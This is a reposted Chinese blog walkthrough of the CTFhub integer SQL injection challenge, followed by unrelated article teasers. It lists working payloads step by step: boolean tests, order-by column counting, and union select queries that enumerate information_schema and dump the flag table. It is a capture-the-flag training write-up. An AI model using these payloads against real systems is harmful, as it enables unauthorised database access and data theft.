CTFhub-sql-整数注入

news/2024/11/18 10:35:13/文章来源:https://blog.csdn.net/ssss39/article/details/132381042

判断存在 sqli 注入

1 and 1=1

 1 and 1=2

因为 1=1 为真，1=2 为假，且 1=1 与 1 显示的数据一样，那么就存在 sqli 注入

查询该数据表的字段数量

一、

1,2成功带出数据，3没有数据，所以有两个字段

二、

1 order by 2

1 order by 3

1 order by 2 与 1 显示的一样，1 order by 3 没有数据,所以，字段数为 2

修改参数 ID 值

1 union select 1,2

由于 1 union select 1,2 只返回第一条结果，union select 的结果没有输出，所以需要修改参数 id

值，可以 -1 ,0 随便哪个都可以

 520 union select 1,2

520 union select 1,version()

520 union select 1,database()  #查询当前数据库信息

查询所有的数据库库名（schemata 表储存用户创建的所有数据库的库名，schema_name 数据库库名）

520 union select 1,group_concat(schema_name)

from information_schema.schemata

查询 sqli 数据库下的数据表（tables 表储存用户创建的所有数据库的库名和表名，table_name数据库的表名）

520 union select 1,group_concat(table_name)

from information_schema.tables

where table_schema='sqli'

查询sqli 数据库下，flag 表中的字段名

（columns 表存储用户创建的所有数据库的库名table_schema、表名table_name、字段名column_name）

0 union select 1,group_concat(column_name)

from information_schema.columns

where table_schema='sqli' and table_name='flag'

查询 sqli 数据库中.flag字段名下的字段内容

520 union select 1,group_concat(flag)

from sqli.flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/47068.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

JAMstack架构：快速构建安全、高性能的现代应用

JAMstack架构：快速构建安全、高性能的现代应用

随着Web应用的快速发展，开发者们在寻找更加高效、安全和可维护的应用架构。JAMstack架构应运而生，它通过将前端、后端和部署过程分离，提供了一种现代化的方式来构建Web应用。在本文中，我们将深入探讨JAMstack架构的特点、优势以及…

阅读更多...

【已解决】Please install Node.js and npm before continuing installation.

【已解决】Please install Node.js and npm before continuing installation.

给juopyter lab安装插件时报这个错原因是，conda本身有nodejs，但是版本很低，只有0.几所以需要卸载掉原来的nodejs，重新安装10版本以上的nodejs # 卸载命令 pip uninstall nodejs # 安装命令 conda install nodejs14.7.0 -c cond…

阅读更多...

蓝蓝设计-ui设计公司-界面设计案例作品

蓝蓝设计-ui设计公司-界面设计案例作品

泛亚高科-光伏电站控制系统界面设计 html前端 | 交互设计 | 视觉设计 | 图标设计泛亚高科(北京)科技有限公司（以下简称“泛亚高科”），一个以实时监控、高精度数值计算为基础的科技公司， 自成立以来，组成了以博士、硕…

阅读更多...

分布式搜索引擎----elasticsearch

分布式搜索引擎----elasticsearch

目录 1、初识elasticsearch 1.1、什么是elasticsearch 1.2.ELK技术栈 2、正向索引和倒排索引 2.1、正向索引 2.2、倒排索引 2.3、正向索引和倒排索引的区别 3、elasticsearch中的概念理解 3.1、文档和字段 3.2、索引和映射 3.3、mysql与elasticsearch 1、初识elasti…

阅读更多...

为什么选择elasticsearch分布式搜索引擎

为什么选择elasticsearch分布式搜索引擎

文章目录 🔭什么是elasticsearch🌠ELK技术栈🌠elasticsearch和lucene🌠为什么不是其他搜索技术？ 🔭总结 🔭什么是elasticsearch elasticsearch是一款非常强大的开源搜索引擎，具备非常…

阅读更多...

SQL有关表的左连接，右连接，以及内连接

SQL有关表的左连接，右连接，以及内连接

首先我们需要想一下，我们为什么需要将表连接在一起呢？换种说法，即我们需要查询的数据不在同一张表里面，而是在A表中查出一部分，然后再去B表中查出一部分，然后两者结合在一起，才是我们需要的部分…

阅读更多...

动漫3D虚拟人物制作为企业数字化转型提供强大动力

动漫3D虚拟人物制作为企业数字化转型提供强大动力

一个 3D 虚拟数字人角色的制作流程，可以分为概念设定-3D 建模-贴图-蒙皮-动画-引擎测试六个步骤，涉及到的岗位有原画师、模型师、动画师等。角色概念设定、贴图绘制一般是由视觉设计师来完成;而建模、装配(骨骼绑定)、渲染动画是由三维设计师来制作完成。…

阅读更多...

R package org.Hs.eg.db to convert gene id

R package org.Hs.eg.db to convert gene id

文章目录 install使用org.Hs.egENSEMBL将Ensembl id convert to gene idorg.Hs.egGENENAME 将Ensembl id convert to gene nameorg.Hs.egSYMBOL 将 gene symbol convert to gene id我现在有一些ensembl id 如何转为 gene name注意你会遇到一些record不全的情况，gtf文…

阅读更多...

商业智能BI是什么都不明白，如何实现数字化？

商业智能BI是什么都不明白，如何实现数字化？

2021年下半年中国商业智能软件市场规模为4.8亿美元，2021年度市场规模达到7.8亿美元，同比增长34.9%，呈现飞速增长的趋势。数字化时代，商业智能BI对于企业的落地应用有着巨大价值，逐渐成为了现代企业信息化、数字化转型中…

阅读更多...

怎么借助ChatGPT处理数据结构的问题

怎么借助ChatGPT处理数据结构的问题

目录使用ChatGPT进行数据格式化转换代码示例 ChatGPT格式化数据提示语代码示例批量格式化数据提示语代码示例 ChatGPT生成的格式化批处理代码使用ChatGPT合并不同数据源的数据合并数据提示语自动合并数据提示语 ChatGPT生成的自动合并代码结论数据合并是…

阅读更多...

在Windows下安装PIP+Phantomjs+Selenium

在Windows下安装PIP+Phantomjs+Selenium

最近准备深入学习Python相关的爬虫知识了，如果说在使用Python爬取相对正规的网页使用"urllib2 BeautifulSoup 正则表达式"就能搞定的话；那么动态生成的信息页面，如Ajax、JavaScript等就需要通过"Phantomjs CasperJS Selen…

阅读更多...

【从零开始的rust web开发之路二】axum中间件和共享状态使用

【从零开始的rust web开发之路二】axum中间件和共享状态使用

系列文章目录第一章 axum学习使用第二章 axum中间件使用文章目录系列文章目录前言一、中间件是什么二、中间件使用常用中间件使用中间件使用TraceLayer中间件实现请求日志打印自定义中间件共享状态前言上篇文件讲了路由和参数相应相关的。axum还有个关键的地方是中间件…

阅读更多...

电工-学习电工有哪些好处

电工-学习电工有哪些好处

学习电工有哪些好处？在哪学习电工？ 学习电工有哪些好处？在哪学习电工？学习电工可以做什么？优势有哪些？ 学习电工可以做什么？学习电工有哪些好处？ 就业去向：可在企业单位…

阅读更多...

基于微信小程序的垃圾分类系统设计与实现（2.0 版本，附前后端代码）

基于微信小程序的垃圾分类系统设计与实现（2.0 版本，附前后端代码）

博主介绍：✌程序员徐师兄、7年大厂程序员经历。全网粉丝30W、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 1 简介视频演示地址： 基于微信小程序的智能垃圾分类回收系统，可作为毕业设计小…

阅读更多...

PyCharm PyQt5 开发环境搭建

PyCharm PyQt5 开发环境搭建

环境 python：3.6.x PyCharm：PyCharm 2019.3.5 (Community Edition) 安装PyQT5 pip install PyQt5 -i https://pypi.douban.com/simplepip install PyQt5-tools -i https://pypi.douban.com/simple配置PyCharm PyQtUIC Program ：D:\Pytho…

阅读更多...

Android kotlin 跳转手机热点开关页面和判断热点是否打开

Android kotlin 跳转手机热点开关页面和判断热点是否打开

Android kotlin 跳转手机热点开关页面和判断热点是否打开判断热点是否打开跳转手机热点开关页面顺带介绍一些其他常用的设置页面跳转其他热点的一些相关知识Local-only hotspot 参考判断热点是否打开网上方法比较多，我这边使用了通过WifiManager 拿反射的getWi…

阅读更多...

从C语言到C++_33(C++11_上)initializer_list+右值引用+完美转发+移动构造/赋值

从C语言到C++_33(C++11_上)initializer_list+右值引用+完美转发+移动构造/赋值

目录 1. 列表初始化initializer_list 2. 前面提到的一些知识点 2.1 小语法 2.2 STL中的一些变化 3. 右值和右值引用 3.1 右值和右值引用概念 3.2 右值引用类型的左值属性 3.3 左值引用与右值引用比较 3.4 右值引用的使用场景 3.4.1 左值引用的功能和短板 3.4.2 移动…

阅读更多...

【javaweb】学习日记Day3 - Ajax 前后端分离开发入门

【javaweb】学习日记Day3 - Ajax 前后端分离开发入门

目录一、Ajax 1、简介 2、Axios （没懂暂留） （1）请求方式别名 （2）发送get请求 （3）发送post请求 （4）案例二、前端工程化 1、Vue项目-目录结构 2、…

阅读更多...

第10步---MySQL的日志操作

第10步---MySQL的日志操作

第10步---MySQL的日志操作错误日志慢日志 1.查看错误日志 -- 查看日志信息 show VARIABLES like log_error%;2.查看binlog 高版本是默认开启的，低的是默认是不开启的 binlog日志文件是与事务相关 -- 查看binlog日志的格式 show variables like binlog_format;-- …

阅读更多...

【Python机器学习】实验15 将Lenet5应用于Cifar10数据集（PyTorch实现）

【Python机器学习】实验15 将Lenet5应用于Cifar10数据集（PyTorch实现）

文章目录 CIFAR10数据集介绍1. 数据的下载2.修改模型与前面的参数设置保持一致3. 新建模型4. 从数据集中分批量读取数据5. 定义损失函数6. 定义优化器7. 开始训练8.测试模型 9. 手写体图片的可视化10. 多幅图片的可视化思考题11. 读取测试集的图片预测值（神经网络的…

阅读更多...

推荐文章

最新文章